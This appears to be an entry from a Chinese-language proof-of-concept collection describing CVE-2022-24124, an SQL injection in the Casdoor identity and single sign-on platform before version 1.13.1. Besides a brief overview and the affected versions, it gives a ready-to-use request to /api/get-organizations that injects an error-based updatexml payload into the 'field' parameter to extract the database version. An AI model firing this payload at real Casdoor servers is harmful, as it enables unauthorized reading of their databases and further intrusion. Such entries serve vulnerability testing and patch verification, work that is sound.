Casdoor api get-oraganizations SQL注入（CVE-2022-24124）

概述

Casdoor是开源的一个身份和访问管理 (IAM) / 单点登录 (SSO) 平台，带有支持 OAuth 2.0 / OIDC 和 SAML 身份验证的 Web UI 。 Casdoor 1.13.1 之前存在安全漏洞，该漏洞允许攻击者通过api/get-organizations进行攻击

影响范围

Casdoor 1.13.1 之前

POC

/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),3)